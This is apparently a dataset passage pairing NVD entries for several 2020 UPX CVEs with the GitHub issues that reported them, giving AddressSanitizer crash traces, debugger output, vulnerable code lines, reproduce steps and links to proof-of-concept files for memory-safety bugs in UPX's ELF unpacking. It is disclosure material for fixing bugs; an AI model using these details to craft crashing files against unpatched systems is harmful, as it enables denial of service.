#12 0x7efe5d03d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x62f00000c532 is located 0 bytes to the right of 49458-byte region [0x62f000000400,0x62f00000c532) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x569797 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/p_lx_elf.cpp:1676:25 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) Shadow bytes around the buggy address: 0x0c5e7fff9850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c5e7fff98a0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa 0x0c5e7fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21202==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_07edd5f520df09443f3622129449d21c6b7c3c7c_.tar.gz](https://github.com/upx/upx/files/4964648/tests_07edd5f520df09443f3622129449d21c6b7c3c7c_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in PackLinuxElf32::invert_pt_dynamic
https://api.github.com/repos/upx/upx/issues/392/comments
1
2020-07-23T08:29:53Z
2020-08-06T06:29:46Z
https://github.com/upx/upx/issues/392
664,292,638
392
CVE-2020-27797
2022-08-25T20:15:08.537
An invalid memory address reference was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/390" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/390
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Segmentation fault in PackLinuxElf32::elf_lookup(char const*) of /src/p_lx_elf.cpp in the latest commit of the devel branch code link : [p_lx_elf.cpp#L5486](https://github.com/upx/upx/blob/87b73e5cfdc12da94c251b2cd83bb01c7d9f616c/src/p_lx_elf.cpp#L5486) ``` for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si])) { char const *const p= get_dynsym_name(si, (unsigned)-1); if (0==strcmp(name, p)) { return &dynsym[si]; } } ``` get_dynsym_name returned an unreadable value and causing crash in strcmp ASAN reports: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==2661==ERROR: AddressSanitizer: SEGV on unknown address 0x6300849b4477 (pc 0x000000430045 bp 0x7ffda416e910 sp 0x7ffda416e0b0 T0) ==2661==The signal is caused by a READ memory access. #0 0x430045 in strcmp (/out/upx-multi/upx-multi+0x430045) #1 0x5d9589 in PackLinuxElf32::elf_lookup(char const*) const /src/upx-multi/src/p_lx_elf.cpp:5411:20 #2 0x588c27 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:318:26 #3 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #4 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #5 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #6 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #7 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #8 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #9 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #10 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #11 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #12 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #13 0x7fee2eaed83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #14 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? POC: [tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_.tar.gz](https://github.com/upx/upx/files/4964506/tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_.tar.gz) ``` # ./src/upx.out -d ./tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_ Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-87b73e Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Segmentation fault in PackLinuxElf32::elf_lookup(char const*) of /src/p_lx_elf.cpp
https://api.github.com/repos/upx/upx/issues/390/comments
2
2020-07-23T08:06:10Z
2020-08-06T06:28:39Z
https://github.com/upx/upx/issues/390
664,279,490
390
CVE-2020-27798
2022-08-25T20:15:08.583
An invalid memory address reference was discovered in the adjABS function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/396
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Segmentation fault in PackLinuxElf64::adjABS of p_lx_elf.cpp in the latest commit of the devel branch code: ``` ────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────── RAX 0x53be80 (abs_symbol_names) ◂— pop rdi /* '__bss_end__' */ RBX 0xe8cf RCX 0xff RDX 0x0 *RDI 0x53be80 (abs_symbol_names) ◂— pop rdi /* '__bss_end__' */ RSI 0xff R8 0xa9d79 R9 0x98c32 R10 0x86f R11 0x246 R12 0xff R13 0x7fffffffe440 ◂— 0x3 R14 0x0 R15 0x0 RBP 0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ... RSP 0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 *RIP 0x442e5e ◂— call 0x401fd0 ─────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────── 0x442e47 lea rax, [rdx*8] 0x442e4f sub rax, rdx 0x442e52 add rax, abs_symbol_names <0x53be80> 0x442e58 mov rsi, rcx 0x442e5b mov rdi, rax ► 0x442e5e call strcmp@plt <0x401fd0> s1: 0x53be80 (abs_symbol_names) ◂— '__bss_end__' s2: 0xff 0x442e63 test eax, eax 0x442e65 sete al 0x442e68 test al, al 0x442e6a je 0x442e89 0x442e6c mov eax, dword ptr [rbp - 0x24] ──────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────── 3132 int 3133 PackLinuxElf64::adjABS(Elf64_Sym *sym, unsigned delta) 3134 { 3135 for (int j = 0; abs_symbol_names[j][0]; ++j) { 3136 unsigned st_name = get_te32(&sym->st_name); ► 3137 if (!strcmp(abs_symbol_names[j], get_str_name(st_name, (unsigned)-1))) { 3138 sym->st_value += delta; 3139 return 1; 3140 } 3141 } 3142 return 0; ──────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 01:0008│ 0x7fffffffd428 ◂— 0xfffff00000804fd8 02:0010│ 0x7fffffffd430 —▸ 0x7ffff7fb5068 ◂— 0xfff10000000000ff 03:0018│ 0x7fffffffd438 —▸ 0x817030 —▸ 0x53e1f8 —▸ 0x43af84 (PackLinuxElf64amd::~PackLinuxElf64amd()) ◂— push rbp 04:0020│ 0x7fffffffd440 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 05:0028│ 0x7fffffffd448 ◂— 0xff00000000 06:0030│ rbp 0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ... 07:0038│ 0x7fffffffd458 —▸ 0x449fab (PackLinuxElf64::unpack(OutputFile*)+3259) ◂— add qword ptr [rbp - 0x158], 0x18 ────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────── ► f 0 442e5e f 1 449fab PackLinuxElf64::unpack(OutputFile*)+3259 f 2 492eb2 Packer::doUnpack(OutputFile*)+90 f 3 49c5ab PackMaster::unpack(OutputFile*)+109 f 4 4b946e f 5 4b985f f 6 42aade main+746 f 7 7ffff727b840 __libc_start_main+240 ``` get_str_name returned an unreadable value and causing crash in strcmp In this poc, get_str_name return 0xff ASAN reports: ``` ==7880==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000ff (pc 0x000000430045 bp 0x7fff7a4d5050 sp 0x7fff7a4d47f0 T0) ==7880==The signal is caused by a READ memory access. ==7880==Hint: address points to the zero page. #0 0x430045 in strcmp (/out/upx-multi/upx-multi+0x430045) #1 0x5b6c98 in PackLinuxElf64::adjABS(N_Elf64::Sym<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> >*, unsigned int) /src/upx-multi/src/p_lx_elf.cpp:3137:14 #2 0x5d06a9 in PackLinuxElf64::unpack(OutputFile*) /src/upx-multi/src/p_lx_elf.cpp:4611:25 #3 0x6c82b0 in Packer::doUnpack(OutputFile*) /src/upx-multi/src/packer.cpp:107:5 #4 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #5 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #6 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #7 0x7fb3d16be83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/out/upx-multi/upx-multi+0x430045) in strcmp ==7880==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? POC: [tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz](https://github.com/upx/upx/files/4971173/tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz) ``` $ ./src/upx.out -d ./tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-8d1d60 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Segmentation fault in PackLinuxElf64::adjABS of p_lx_elf.cpp
https://api.github.com/repos/upx/upx/issues/396/comments
1
2020-07-24T09:28:47Z
2020-08-06T06:30:09Z
https://github.com/upx/upx/issues/396
665,044,143
396
CVE-2020-27799
2022-08-25T20:15:08.630
A heap-based buffer over-read was discovered in the acc_ua_get_be32 function in miniacc.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/391" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/391
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==21053==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6160000014bb at pc 0x000000755961 bp 0x7ffe38d0c080 sp 0x7ffe38d0c078 READ of size 1 at 0x6160000014bb thread T0 #0 0x755960 in acc_ua_get_be32(void const*) /src/upx-multi/src/./miniacc.h:6099:12 #1 0x755960 in get_be32(void const*) /src/upx-multi/src/./bele.h:78:12 #2 0x755960 in N_BELE_RTP::BEPolicy::get32(void const*) const /src/upx-multi/src/./bele_policy.h:115:18 #3 0x58a254 in Packer::get_te32(void const*) const /src/upx-multi/src/./packer.h:296:65 #4 0x58a254 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /src/upx-multi/src/p_lx_elf.cpp:1601:32 #5 0x588959 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #6 0x5d70d4 in PackLinuxElf32Be::PackLinuxElf32Be(InputFile*) /src/upx-multi/src/./p_lx_elf.h:385:9 #7 0x5d70d4 in PackLinuxElf32armBe::PackLinuxElf32armBe(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4969:58 #8 0x6e50c0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:196:9 #9 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #10 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #11 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #12 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #13 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #14 0x7fcbbeced83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x6160000014bb is located 4 bytes to the right of 567-byte region [0x616000001280,0x6160000014b7) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x569797 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./miniacc.h:6099:12 in acc_ua_get_be32(void const*) Shadow bytes around the buggy address: 0x0c2c7fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff8290: 00 00 00 00 00 00 07[fa]fa fa fa fa fa fa fa fa 0x0c2c7fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff82e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21053==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [poc-heap-buffer-overflow-2.tar.gz](https://github.com/upx/upx/files/4964580/poc-heap-buffer-overflow-2.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in acc_ua_get_be32()
https://api.github.com/repos/upx/upx/issues/391/comments
1
2020-07-23T08:13:04Z
2020-08-06T06:29:39Z
https://github.com/upx/upx/issues/391
664,283,181
391
CVE-2020-27800
2022-08-25T20:15:08.677
A heap-based buffer over-read was discovered in the get_le32 function in bele.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/395" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/395
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==5614==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x624000007da0 at pc 0x000000757233 bp 0x7ffe125eb8e0 sp 0x7ffe125eb8d8 READ of size 4 at 0x624000007da0 thread T0 #0 0x757232 in get_le32(void const*) /src/upx-multi/src/./bele.h:164:12 #1 0x757232 in N_BELE_RTP::LEPolicy::get32(void const*) const /src/upx-multi/src/./bele_policy.h:192:18 #2 0x58a45e in Packer::get_te32(void const*) const /src/upx-multi/src/./packer.h:296:65 #3 0x58a45e in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*, unsignedint) /src/upx-multi/src/p_lx_elf.cpp:1610:32 #4 0x588a1e in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #5 0x5d6504 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #6 0x5d6504 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4847:54 #7 0x5d6a4c in PackNetBSDElf32x86::PackNetBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4884:56 #8 0x6e4df0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:191:9 #9 0x6e9771 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #10 0x6e9771 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #11 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #12 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #13 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #14 0x7fc6ddc5d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x624000007da2 is located 0 bytes to the right of 7330-byte region [0x624000006100,0x624000007da2) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x5697b7 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./bele.h:164:12 in get_le32(void const*) Shadow bytes around the buggy address: 0x0c487fff8f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c487fff8fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c487fff8fb0: 00 00 00 00[02]fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff8ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c487fff9000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==5614==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_192f7cabc11cc03830cccf5a14885865d1532c0d_.tar.gz](https://github.com/upx/upx/files/4970829/tests_192f7cabc11cc03830cccf5a14885865d1532c0d_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Another heap buffer overflow in get_le32()
https://api.github.com/repos/upx/upx/issues/395/comments
1
